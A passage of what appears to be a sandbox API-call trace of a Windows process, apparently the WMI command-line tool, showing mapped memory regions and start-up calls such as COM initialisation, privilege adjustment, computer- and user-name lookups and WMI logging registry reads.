region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1469 start_va = 0x2230000 end_va = 0x230efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 1470 start_va = 0x2320000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1471 start_va = 0x2c40000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 1472 start_va = 0x2cf0000 end_va = 0x2d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 1473 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1474 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1475 start_va = 0x1fc0000 end_va = 0x2004fff monitored = 0 entry_point = 0x1fc1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1476 start_va = 0x2010000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1477 start_va = 0x1fc0000 end_va = 0x2004fff monitored = 0 entry_point = 0x1fc1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1478 start_va = 0x1fc0000 end_va = 0x2004fff monitored = 0 entry_point = 0x1fc1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1479 start_va = 0x1fc0000 end_va = 0x2004fff monitored = 0 entry_point = 0x1fc1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1480 start_va = 0x1fc0000 end_va = 0x2004fff monitored = 0 entry_point = 0x1fc1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1481 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1482 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1483 start_va = 0x2b60000 end_va = 0x2bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 1484 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1485 start_va = 0x2e30000 end_va = 0x2eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 1486 start_va = 0x2f60000 end_va = 0x2fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1487 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1488 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1489 start_va = 0x7fef3ad0000 end_va = 0x7fef3ae2fff monitored = 0 entry_point = 0x7fef3ad7b68 region_type = mapped_file name = "msoxmlmf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll") Region: id = 1490 start_va = 0x7fef8bd0000 end_va = 0x7fef8be8fff monitored = 0 entry_point = 0x7fef8bdee50 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 1491 start_va = 0x7fef8bc0000 end_va = 0x7fef8bc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 1492 start_va = 0x7fef8ac0000 end_va = 0x7fef8bb1fff monitored = 0 entry_point = 0x7fef8ac9060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1493 start_va = 0x7fef8ab0000 end_va = 0x7fef8ab2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 1494 start_va = 0x7fef8aa0000 end_va = 0x7fef8aa2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 1495 start_va = 0x7fef8a90000 end_va = 0x7fef8a92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 1496 start_va = 0x7fef9210000 end_va = 0x7fef9212fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1497 start_va = 0x7fef8a80000 end_va = 0x7fef8a82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 1498 start_va = 0x7fef8a70000 end_va = 0x7fef8a72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 1499 start_va = 0x7fef8a60000 end_va = 0x7fef8a62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 1500 start_va = 0x7fef8a50000 end_va = 0x7fef8a53fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 1501 start_va = 0x7fef8a40000 end_va = 0x7fef8a43fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 1502 start_va = 0x7fef8a30000 end_va = 0x7fef8a33fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 1503 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 1504 start_va = 0x1eb0000 end_va = 0x1eb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 1848 start_va = 0x7fef98a0000 end_va = 0x7fef98b2fff monitored = 0 entry_point = 0x7fef98a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1849 start_va = 0x7fef9bc0000 end_va = 0x7fef9c92fff monitored = 0 entry_point = 0x7fef9c38b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1850 start_va = 0x7fef9b90000 end_va = 0x7fef9bb6fff monitored = 0 entry_point = 0x7fef9b911a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1851 start_va = 0x1fc0000 end_va = 0x1fccfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fc0000" filename = "" Thread: id = 42 os_tid = 0xca8 [0148.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17f800 | out: lpSystemTimeAsFileTime=0x17f800*(dwLowDateTime=0xaa90ebe0, dwHighDateTime=0x1d9897a)) [0148.881] GetCurrentProcessId () returned 0xcac [0148.881] GetCurrentThreadId () returned 0xca8 [0148.881] GetTickCount () returned 0x2059ff1 [0148.881] QueryPerformanceCounter (in: lpPerformanceCount=0x17f808 | out: lpPerformanceCount=0x17f808*=3405103590712) returned 1 [0148.881] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0148.881] __set_app_type (_Type=0x1) [0148.882] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff74ced0) returned 0x0 [0148.882] __wgetmainargs (in: _Argc=0xff772380, _Argv=0xff772390, _Env=0xff772388, _DoWildCard=0, _StartInfo=0xff77239c | out: _Argc=0xff772380, _Argv=0xff772390, _Env=0xff772388) returned 0 [0148.883] ??0CHString@@QEAA@XZ () returned 0xff772ab0 [0148.883] malloc (_Size=0x30) returned 0x235b20 [0148.883] malloc (_Size=0x70) returned 0x237b30 [0148.883] malloc (_Size=0x50) returned 0x237bb0 [0148.883] malloc (_Size=0x30) returned 0x237c10 [0148.883] malloc (_Size=0x48) returned 0x237c50 [0148.883] malloc (_Size=0x30) returned 0x237ca0 [0148.883] malloc (_Size=0x30) returned 0x237ce0 [0148.883] ??0CHString@@QEAA@XZ () returned 0xff772f58 [0148.883] malloc (_Size=0x30) returned 0x237d20 [0148.883] ?Empty@CHString@@QEAAXXZ () returned 0x7fef77bc96c [0148.883] SetConsoleCtrlHandler (HandlerRoutine=0xff745724, Add=1) returned 1 [0148.883] _onexit (_Func=0xff75f378) returned 0xff75f378 [0148.884] _onexit (_Func=0xff75f490) returned 0xff75f490 [0148.884] _onexit (_Func=0xff75f4d0) returned 0xff75f4d0 [0148.884] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0148.884] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0148.893] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0148.908] CoCreateInstance (in: rclsid=0xff7073a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff707370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff772940 | out: ppv=0xff772940*=0x28cc10) returned 0x0 [0148.954] GetCurrentProcess () returned 0xffffffffffffffff [0148.954] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x17f5d0 | out: TokenHandle=0x17f5d0*=0x104) returned 1 [0148.954] GetTokenInformation (in: TokenHandle=0x104, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x17f5c8 | out: TokenInformation=0x0, ReturnLength=0x17f5c8) returned 0 [0148.954] malloc (_Size=0x118) returned 0x2363e0 [0148.954] GetTokenInformation (in: TokenHandle=0x104, TokenInformationClass=0x3, TokenInformation=0x2363e0, TokenInformationLength=0x118, ReturnLength=0x17f5c8 | out: TokenInformation=0x2363e0, ReturnLength=0x17f5c8) returned 1 [0148.955] AdjustTokenPrivileges (in: TokenHandle=0x104, DisableAllPrivileges=0, NewState=0x2363e0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1061800924, Attributes=0xc54b), (Luid.LowPart=0x0, Luid.HighPart=2326400, Attributes=0x0), (Luid.LowPart=0x4f0043, Luid.HighPart=5242957, Attributes=0x540055), (Luid.LowPart=0x41004e, Luid.HighPart=4522061, Attributes=0x51003d), (Luid.LowPart=0x540041, Luid.HighPart=4915282, Attributes=0x520050), (Luid.LowPart=0x6f0043, Luid.HighPart=5439597, Attributes=0x650070))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0148.955] free (_Block=0x2363e0) [0148.955] CloseHandle (hObject=0x104) returned 1 [0148.955] malloc (_Size=0x40) returned 0x237f80 [0148.955] malloc (_Size=0x40) returned 0x2363e0 [0148.955] malloc (_Size=0x40) returned 0x236430 [0148.955] malloc (_Size=0x20a) returned 0x236480 [0148.955] GetSystemDirectoryW (in: lpBuffer=0x236480, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.955] free (_Block=0x236480) [0148.955] malloc (_Size=0x18) returned 0x235b60 [0148.955] malloc (_Size=0x18) returned 0x36dfa0 [0148.955] malloc (_Size=0x18) returned 0x236480 [0148.955] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0148.956] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0148.956] memcpy (in: _Dst=0x294278, _Src=0x2913e8, _Size=0x28 | out: _Dst=0x294278) returned 0x294278 [0148.956] memcpy (in: _Dst=0x29429e, _Src=0x291428, _Size=0x1c | out: _Dst=0x29429e) returned 0x29429e [0148.956] free (_Block=0x235b60) [0148.956] free (_Block=0x36dfa0) [0148.956] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77710000 [0148.956] GetProcAddress (hModule=0x77710000, lpProcName="SetThreadUILanguage") returned 0x777261e0 [0148.956] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0148.956] FreeLibrary (hLibModule=0x77710000) returned 1 [0148.956] free (_Block=0x236480) [0148.956] _vsnwprintf (in: _Buffer=0x236430, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x17f1f8 | out: _Buffer="ms_409") returned 6 [0148.957] malloc (_Size=0x20) returned 0x36dfa0 [0148.957] GetComputerNameW (in: lpBuffer=0x36dfa0, nSize=0x17f5d0 | out: lpBuffer="Q9IATRKPRH", nSize=0x17f5d0) returned 1 [0148.957] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.957] malloc (_Size=0x16) returned 0x235b60 [0148.957] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.957] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x17f5c8 | out: lpNameBuffer=0x0, nSize=0x17f5c8) returned 0x7fffffde000 [0148.960] GetLastError () returned 0xea [0148.960] malloc (_Size=0x2c) returned 0x236480 [0148.960] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x236480, nSize=0x17f5c8 | out: lpNameBuffer="Q9IATRKPRH\\kEecfMwgj", nSize=0x17f5c8) returned 0x1 [0148.960] lstrlenW (lpString="") returned 0 [0148.960] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.960] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3 [0148.964] lstrlenW (lpString=".") returned 1 [0148.964] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2=".", cchCount2=1) returned 3 [0148.964] lstrlenW (lpString="LOCALHOST") returned 9 [0148.964] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="LOCALHOST", cchCount2=9) returned 3 [0148.964] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.964] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="Q9IATRKPRH", cchCount2=10) returned 2 [0148.964] free (_Block=0x235b60) [0148.964] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.964] malloc (_Size=0x16) returned 0x235b60 [0148.964] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.964] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.964] malloc (_Size=0x16) returned 0x2364c0 [0148.964] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0148.965] malloc (_Size=0x8) returned 0x2364e0 [0148.965] malloc (_Size=0x18) returned 0x236500 [0148.965] malloc (_Size=0x30) returned 0x236520 [0148.965] malloc (_Size=0x18) returned 0x236560 [0148.965] SysStringLen (param_1="IDENTIFY") returned 0x8 [0148.965] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0148.965] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0148.965] SysStringLen (param_1="IDENTIFY") returned 0x8 [0148.965] malloc (_Size=0x30) returned 0x236580 [0148.965] malloc (_Size=0x18) returned 0x2365c0 [0148.965] SysStringLen (param_1="IMPERSONATE") returned 0xb [0148.965] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0148.965] SysStringLen (param_1="IMPERSONATE") returned 0xb [0148.965] SysStringLen (param_1="IDENTIFY") returned 0x8 [0148.965] SysStringLen (param_1="IDENTIFY") returned 0x8 [0148.965] SysStringLen (param_1="IMPERSONATE") returned 0xb [0148.965] malloc (_Size=0x30) returned 0x2365e0 [0148.965] malloc (_Size=0x18) returned 0x236620 [0148.965] SysStringLen (param_1="DELEGATE") returned 0x8 [0148.965] SysStringLen (param_1="IDENTIFY") returned 0x8 [0148.965] SysStringLen (param_1="DELEGATE") returned 0x8 [0148.965] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0148.965] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0148.966] SysStringLen (param_1="DELEGATE") returned 0x8 [0148.966] malloc (_Size=0x30) returned 0x236640 [0148.966] malloc (_Size=0x18) returned 0x236680 [0148.966] malloc (_Size=0x30) returned 0x2366a0 [0148.966] malloc (_Size=0x18) returned 0x2366e0 [0148.966] SysStringLen (param_1="NONE") returned 0x4 [0148.966] SysStringLen (param_1="DEFAULT") returned 0x7 [0148.966] SysStringLen (param_1="DEFAULT") returned 0x7 [0148.966] SysStringLen (param_1="NONE") returned 0x4 [0148.966] malloc (_Size=0x30) returned 0x236700 [0148.966] malloc (_Size=0x18) returned 0x236740 [0148.966] SysStringLen (param_1="CONNECT") returned 0x7 [0148.966] SysStringLen (param_1="DEFAULT") returned 0x7 [0148.966] malloc (_Size=0x30) returned 0x236760 [0148.966] malloc (_Size=0x18) returned 0x2367a0 [0148.966] SysStringLen (param_1="CALL") returned 0x4 [0148.966] SysStringLen (param_1="DEFAULT") returned 0x7 [0148.966] SysStringLen (param_1="CALL") returned 0x4 [0148.966] SysStringLen (param_1="CONNECT") returned 0x7 [0148.966] malloc (_Size=0x30) returned 0x2367c0 [0148.966] malloc (_Size=0x18) returned 0x236800 [0148.966] SysStringLen (param_1="PKT") returned 0x3 [0148.966] SysStringLen (param_1="DEFAULT") returned 0x7 [0148.966] SysStringLen (param_1="PKT") returned 0x3 [0148.966] SysStringLen (param_1="NONE") returned 0x4 [0148.966] SysStringLen (param_1="NONE") returned 0x4 [0148.967] SysStringLen (param_1="PKT") returned 0x3 [0148.967] malloc (_Size=0x30) returned 0x238000 [0148.967] malloc (_Size=0x18) returned 0x236c20 [0148.967] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0148.967] SysStringLen (param_1="DEFAULT") returned 0x7 [0148.967] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0148.967] SysStringLen (param_1="NONE") returned 0x4 [0148.967] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0148.967] SysStringLen (param_1="PKT") returned 0x3 [0148.967] SysStringLen (param_1="PKT") returned 0x3 [0148.967] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0148.967] malloc (_Size=0x30) returned 0x238040 [0148.967] malloc (_Size=0x18) returned 0x236c40 [0148.967] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0148.967] SysStringLen (param_1="DEFAULT") returned 0x7 [0148.967] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0148.967] SysStringLen (param_1="PKT") returned 0x3 [0148.968] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0148.968] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0148.968] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0148.968] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0148.968] malloc (_Size=0x30) returned 0x238080 [0148.968] malloc (_Size=0x40) returned 0x236c60 [0148.968] malloc (_Size=0x20a) returned 0x238fd0 [0148.968] GetSystemDirectoryW (in: lpBuffer=0x238fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.968] free (_Block=0x238fd0) [0148.968] malloc (_Size=0x18) returned 0x236cb0 [0148.968] malloc (_Size=0x18) returned 0x236cd0 [0148.968] malloc (_Size=0x18) returned 0x236cf0 [0148.968] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0148.968] SysStringLen (param_1="\\wbem\\") returned 0x6 [0148.968] memcpy (in: _Dst=0x276738, _Src=0x291428, _Size=0x28 | out: _Dst=0x276738) returned 0x276738 [0148.968] memcpy (in: _Dst=0x27675e, _Src=0x290a98, _Size=0xe | out: _Dst=0x27675e) returned 0x27675e [0148.968] free (_Block=0x236cb0) [0148.968] free (_Block=0x236cd0) [0148.969] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0148.969] free (_Block=0x236cf0) [0148.969] malloc (_Size=0x18) returned 0x239000 [0148.969] malloc (_Size=0x18) returned 0x239020 [0148.969] malloc (_Size=0x18) returned 0x239040 [0148.969] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0148.969] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0148.969] memcpy (in: _Dst=0x2948f8, _Src=0x276788, _Size=0x34 | out: _Dst=0x2948f8) returned 0x2948f8 [0148.969] memcpy (in: _Dst=0x29492a, _Src=0x291428, _Size=0x22 | out: _Dst=0x29492a) returned 0x29492a [0148.969] free (_Block=0x239000) [0148.969] free (_Block=0x239020) [0148.969] GetCurrentThreadId () returned 0xca8 [0148.969] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x17eed0 | out: phkResult=0x17eed0*=0x108) returned 0x0 [0148.969] RegQueryValueExW (in: hKey=0x108, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x17ef20, lpcbData=0x17eec0*=0x400 | out: lpType=0x0, lpData=0x17ef20*=0x30, lpcbData=0x17eec0*=0x4) returned 0x0 [0148.970] _wcsicmp (_String1="0", _String2="1") returned -1 [0148.970] _wcsicmp (_String1="0", _String2="2") returned -2 [0148.970] RegQueryValueExW (in: hKey=0x108, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x17eec0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x17eec0*=0x42) returned 0x0 [0148.970] malloc (_Size=0x86) returned 0x236cb0 [0148.970] RegQueryValueExW (in: hKey=0x108, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x236cb0, lpcbData=0x17eec0*=0x42 | out: lpType=0x0, lpData=0x236cb0*=0x25, lpcbData=0x17eec0*=0x42) returned 0x0 [0148.970] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0148.970] malloc (_Size=0x42) returned 0x236d40 [0148.970] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0148.970] RegQueryValueExW (in: hKey=0x108, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x17ef20, lpcbData=0x17eec0*=0x400 | out: lpType=0x0, lpData=0x17ef20*=0x36, lpcbData=0x17eec0*=0xc) returned 0x0 [0148.970] _wtol (_String="65536") returned 65536 [0148.970] free (_Block=0x236cb0) [0148.970] RegCloseKey (hKey=0x0) returned 0x6 [0148.970] CoCreateInstance (in: rclsid=0xff707410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff7073f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x17f3c8 | out: ppv=0x17f3c8*=0x1f471d0) returned 0x0 [0149.012] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1f471d0, xmlSource=0x17f510*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x236cb0), isSuccessful=0x17f580 | out: isSuccessful=0x17f580*=0xffff) returned 0x0 [0149.300] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1f471d0, DOMElement=0x17f3c0 | out: DOMElement=0x17f3c0*=0x1f4bc50) returned 0x0 [0149.300] malloc (_Size=0x18) returned 0x239020 [0149.300] IXMLDOMElement:getElementsByTagName (in: This=0x1f4bc50, tagName="XSLFORMAT", resultList=0x17f3d0 | out: resultList=0x17f3d0*=0x1f49cc0) returned 0x0 [0149.301] free (_Block=0x239020) [0149.301] IXMLDOMNodeList:get_length (in: This=0x1f49cc0, listLength=0x17f598 | out: listLength=0x17f598*=21) returned 0x0 [0149.302] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=0, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.302] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="texttable.xsl") returned 0x0 [0149.302] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.302] malloc (_Size=0x18) returned 0x239020 [0149.302] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.302] free (_Block=0x239020) [0149.302] IXMLDOMNode:get_nodeValue (in: 